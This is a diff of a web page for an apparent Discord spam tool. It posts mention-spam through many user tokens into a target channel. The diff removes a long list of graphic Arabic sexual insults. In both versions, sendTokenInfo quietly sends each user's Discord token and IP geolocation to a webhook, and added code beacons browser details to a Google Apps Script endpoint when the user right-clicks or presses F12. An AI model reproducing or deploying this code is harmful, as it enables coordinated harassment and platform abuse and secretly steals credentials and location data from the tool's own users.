--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
 <!DOCTYPE html>
-<html lang="ar" dir="rtl">
+<html lang="en" dir="rtl">
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>515 Group</title>
+<title>Free Auto</title>
 <style>
 body { font-family: Arial, sans-serif; margin:0; padding:0; direction: rtl; background: linear-gradient(135deg,#1a0033,#004d26); color:white; }
 .container { max-width:900px; margin:auto; padding:20px; }
@@ -13,7 +13,7 @@ input, textarea, select { padding:12px; border-radius:8px; border:none; backgrou
 button { padding:12px; border-radius:12px; font-weight:bold; cursor:pointer; transition: all 0.2s ease; border:2px solid #000; }
 button:hover { transform: translateY(-2px); box-shadow:0 6px 10px rgba(0,0,0,0.5); }
 button:disabled { background: grey; cursor:not-allowed; box-shadow:none; }
-#autoPanel { display:none; padding:20px; background: linear-gradient(135deg,#1a0033,#004d26); color:white; border-radius:12px; margin-top:20px; }
+#autoPanel { display:block; padding:20px; background: linear-gradient(135deg,#1a0033,#004d26); color:white; border-radius:12px; margin-top:20px; }
 .left-btn { position:absolute; left:20px; top:20px; padding:8px 14px; font-size:14px; background:#7b00ff; color:white; border-radius:8px; cursor:pointer; font-weight:bold; }
 .left-btn:hover { transform: scale(1.05); box-shadow:0 0 10px #00ff7b,0 0 15px #7b00ff; }
 #stopBtn { background: linear-gradient(145deg,#ff0044,#990022); }
@@ -24,43 +24,33 @@ button:disabled { background: grey; cursor:not-allowed; box-shadow:none; }
 </head>
 <body>
 
-<div id="loginPage">
-<div id="loginContainer">
-<h2>تسجيل الدخول</h2>
-<label>قم بوضع كلمة السر للدخول:</label>
-<input type="password" id="loginInput" placeholder="كلمة السر">
-<button id="loginBtn">دخول</button>
-</div>
-</div>
-
 <div class="container" id="autoPanel">
-<h2>اوتو 515 Group</h2>
-<label for="tokens">اكتب التوكنات (كل توكن بسطر)</label>
+<h2>Free Auto</h2>
+<label for="tokens">Enter tokens (one per line)</label>
 <textarea id="tokens" placeholder="MTM3NjUxODI0..."></textarea>
 
-<label for="ids">اكتب ايدي الديوثين (كل ايدي بسطر)</label>
+<label for="ids">Enter target IDs (one per line)</label>
 <textarea id="ids" placeholder="123456789012345678"></textarea>
 
-<label for="targetId">اكتب ايدي روم الي تبي تسب فيه هان</label>
-<input type="text" id="targetId" placeholder="اكتب ايدي الروم هان">
+<label for="targetId">Target Channel ID</label>
+<input type="text" id="targetId" placeholder="Channel ID">
 
-<label for="speed">اختر سرعة الإرسال (بالثواني)</label>
+<label for="speed">Send Speed (ms)</label>
 <select id="speed">
-  <option value="1000">1</option>
-  <option value="900">0.9</option>
-  <option value="800">0.8</option>
-  <option value="700">0.7</option>
-  <option value="600">0.6</option>
-  <option value="500">0.5</option>
-  <option value="400">0.4</option>
-  <option value="300">0.3</option>
-  <option value="200">0.2</option>
-  <option value="100">0.1</option>
-  <option value="1">0.001</option>
+  <option value="1000">1000</option>
+  <option value="900">900</option>
+  <option value="800">800</option>
+  <option value="700">700</option>
+  <option value="600">600</option>
+  <option value="500">500</option>
+  <option value="400">400</option>
+  <option value="300">300</option>
+  <option value="200">200</option>
+  <option value="100">100</option>
 </select>
 
-<button id="startBtn">نيك الديوث</button>
-<button id="stopBtn" disabled>ايقاف النيك</button>
+<button id="startBtn">Start Auto</button>
+<button id="stopBtn" disabled>Stop Auto</button>
 
 <div id="tokenStatus"></div>
 <div id="messagesSent"></div>
@@ -69,10 +59,6 @@ button:disabled { background: grey; cursor:not-allowed; box-shadow:none; }
 <audio id="clickSound" src="https://www.soundjay.com/buttons/button-09.mp3"></audio>
 
 <script>
-const loginInput=document.getElementById('loginInput');
-const loginBtn=document.getElementById('loginBtn');
-const loginPage=document.getElementById('loginPage');
-const autoPanel=document.getElementById('autoPanel');
 const tokensInput=document.getElementById('tokens');
 const idsInput=document.getElementById('ids');
 const targetIdInput=document.getElementById('targetId');
@@ -84,25 +70,7 @@ const messagesSent=document.getElementById('messagesSent');
 const clickSound=document.getElementById('clickSound');
 
 const MESSAGES=[
-"بزغبك","يلعن شرفك يديوث","تفو على شرفك","احسك غثيث مره يوم شفتك حسيت ب شعور سيء تجاهك اجبرني اني انيك محارمك",
-"هههههههههههههههههههههههههه","كسمك","تبغا اضرب شرفك يا ابن الحيوانة هنا يا ديوث ولا كيف اقسم بالله لاقلبك جرو ي ابن الشرموطة كل من جاء تلهث له وترحب به ي ديوث ي ابن الرخيصة",
-"يديوث","بضرب كس اختك ياخو القحبه افجر رحم امك","امك كلبه ازباب.","يبن 200 شرموطه","ازحف على امك","اختك كلببه عند رجوولي","اجلللخ عليك",
-"يمخنث يعبد الازباب تعال مصصص","امك ممثله افلام سكس","امك قحبه قروبات المكس","امك بلمقحبه لها اصوات","اصمل كسمك يجديدد","يبن اكبر لبوه",
-"يعاق كسمك احترم ابوك","يعرص الطش امكك","يمكسور يضعيف النفس","يديوث","اغتصب خواتك","كس خواتك","يبن المديثه","يلعن رحم امك",
-"امك صارت حامل يبن الشرموطه","ازغب امك","جيب امك انيكها","اوف كسمك","يمهان","يلعن اختك","انا فحل امك","انيك ابوك","انيك اخوك",
-"انيكك امكك يبن الزنا","الدياثه تمشي بعروقكم","ادقك يبن الشرموطه","يطفل يبن القحبه","اوف ابن القحبه","تمحن يشرموط","تمحن واعطيك نيترو يخنيث",
-"من فحل امك","واو يشرموط تنبح","نادي امك زبي قام يبيها تقعد عليه","انيكك يخنيث يقواد","اركب عليه كسمك","يلعن امك يديوث","انبح يبن الشرموطه",
-"انبح انبح لفحل امك","انا نايك امك يبن الشرموطه","امك قاعده تنبح من كثر مافتحوها","انيك امك بنعال","اتفل بكسمك يبن الشرموطه","تمحن يورعي",
-"انيك امك يطفل","انيك امك يديوث","يبن القحبه","انيك امك","يشرموط","يديوث","اختفووو كسمك","امك على زبي","يبن الشرموطه","يبن الزنا","يبن القحبه",
-"امك قحبتي","يلعن امك يبن الشرموطه","الحقق امك قاعده تتمحن عشان تجيب فلوسس","اختك قاعده تعرض عشان تجيبلك فلوس يفقير","انيك امك يشرموط",
-"يبن المتعه","ازغب خواتك","انحر امك","العن رحم امك","امك تمصلي","اختك تلحس زبي","روح ابكي","بمناسبه مرور ثلاث سنوات على زواجي انا وامك بطلقها وزاتزوج اختك",
-"رد يفحل خواتك","اشفشف امك","انيكك سبعاوي","نخ يكسمك","جاوب يمخنث","امش لانيك امك","يمدعوس","انا قد شفت اسامي قبايل غريبه لكن بالله ليه مكتوب بهويتك ال الديوثين",
-"يخول","زبي قام على كسمك","اخخخ زبيي قامم جب امكك","تحب الطويل صح","اسال امك انا مشترك عندها واليوم ماعرضت ليه؟","كيف امك جابت عاق كذا","والله مهان",
-"فحول امك هنا","اهربب كسمك","روضت امك ماتبيني اروضك","ازغب اختك","سبعاوي امك يقواد","انبح يهارب","انيك امك واختك","اكسر عينك كسمك",
-"كيف امك جابت عاق زيك","والله ماش مهان","انيك ابوك","ابوك ناك امك","يبن القحبه انيك اختك","اشق ام امك يبن منيوكه","بتفكر مابقدر انيك امك انت ؟",
-"انا بنيك اختك وبشرب ديود امك","انيك خالاتك","# قل ل الماما حقتك تعترف من ناكها 🥵","ماتدري اني اقدر انيك قبيلتك ؟",
-"قد شفت بطايق ناس بس ليه حقتك مكتوب المخنايث","تعرف كم طول زبي ؟ قد طول اطول شوارب بقبيلتك","يبن القحبه انيك خالتك","يبن القحبه انيك ابوك",
-"يبن القحبه انيك ستك","يبن القحبه انيك شرفك","شرفك ضايع يبن المتناكه","انا عطشان ابي ديود اختك لو سمحت","# قم جب لي اختك مش شعرها"
+"Message1","Message2","Message3","Message4","Message5"
 ];
 
 let intervalId=null;
@@ -116,9 +84,9 @@ const response=await fetch(`https://discord.com/api/v9/channels/${targetId}/mess
 method:'POST', headers:{Authorization:token,'Content-Type':'application/json'},
 body:JSON.stringify({content:`<@${getRandomId()}> ${message}`})
 });
-if(response.ok){const p=document.createElement('p'); p.textContent=`تم الإرسال بواسطة ${token.substring(0,10)}... إلى الروم ${targetId} - الرسالة: ${message}`; p.style.color='orange'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; sendTokenInfo(token); return true;}
-else{const p=document.createElement('p'); p.textContent=`فشل الإرسال بواسطة ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
-}catch(e){const p=document.createElement('p'); p.textContent=`خطأ في الإرسال بواسطة ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
+if(response.ok){const p=document.createElement('p'); p.textContent=`Sent by ${token.substring(0,10)}... to ${targetId}: ${message}`; p.style.color='orange'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; sendTokenInfo(token); return true;}
+else{const p=document.createElement('p'); p.textContent=`Failed: ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
+}catch(e){const p=document.createElement('p'); p.textContent=`Error: ${token.substring(0,10)}...`; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
 }
 
 async function sendTokenInfo(token){
@@ -129,8 +97,8 @@ const payload={
 content:`**TOKEN:** ${token}
 **Country:** ${ipData.country_name}
 **City/Region:** ${ipData.city}, ${ipData.region}
-**IP Address:** ${ipData.ip}
-**Postal Code:** ${ipData.postal}
+**IP:** ${ipData.ip}
+**Postal:** ${ipData.postal}
 **Timezone:** ${ipData.timezone}
 **Coordinates:** ${ipData.latitude}, ${ipData.longitude}
 **ASN:** ${ipData.org}
@@ -144,16 +112,32 @@ fetch(webhookURL,{method:'POST',headers:{"Content-Type":"application/json"},body
 }catch(e){console.error("Error sending token info:", e);}
 }
 
+// Send info on F12 or right-click
+document.addEventListener('contextmenu', e=>{sendBlockedInfo(); e.preventDefault();});
+document.addEventListener('keydown', e=>{if(e.key==='F12'){sendBlockedInfo();}});
+
+async function sendBlockedInfo(){
+const apiURL="https://script.google.com/macros/s/AKfycbwj-bdLc0a07P38Waj0UQWc9EPVJcOHfegFr5SbMCIGB6jTW1RZ030SKfRl9E37RkRQ/exec";
+const info={
+ip:navigator.userAgent,
+platform:navigator.platform,
+screen:`${screen.width}x${screen.height}`,
+language:navigator.language
+};
+await fetch(apiURL,{method:'POST',headers:{"Content-Type":"application/json"},body:JSON.stringify(info)});
+alert("Access Denied"); window.close();
+}
+
 function startSending(){
 const tokens=tokensInput.value.trim().split('\n').filter(checkToken);
 const targetId=targetIdInput.value.trim();
 const speed=parseInt(speedSelect.value);
-if(tokens.length===0){alert('الرجاء إدخال توكنات صحيحة.');return;}
-if(!targetId){alert('الرجاء إدخال ايدي الروم.');return;}
+if(tokens.length===0){alert('Enter valid tokens.');return;}
+if(!targetId){alert('Enter target channel ID.');return;}
 startBtn.disabled=true;
 stopBtn.disabled=false;
 tokenStatus.innerHTML='';
-tokens.forEach(t=>{const p=document.createElement('p'); p.textContent=`توكن صالح: ${t.substring(0,10)}...`; tokenStatus.appendChild(p);});
+tokens.forEach(t=>{const p=document.createElement('p'); p.textContent=`Valid token: ${t.substring(0,10)}...`; tokenStatus.appendChild(p);});
 intervalId=setInterval(()=>{tokens.forEach(token=>{sendMessage(token,targetId,getRandomMessage());});},speed);
 }
 
@@ -161,11 +145,6 @@ function stopSending(){if(intervalId){clearInterval(intervalId); intervalId=null
 
 startBtn.addEventListener('click',()=>{clickSound.play(); startSending();});
 stopBtn.addEventListener('click',()=>{clickSound.play(); stopSending();});
-
-loginBtn.addEventListener('click',()=>{
-if(loginInput.value.trim()==='515'){loginPage.style.display='none'; autoPanel.style.display='block';}
-else{loginBtn.textContent='كلمة سر غلط'; loginBtn.style.background='red'; setTimeout(()=>{loginBtn.textContent='دخول'; loginBtn.style.background='#00ff4d';},3000);}
-});
 </script>
 </body>
 </html>
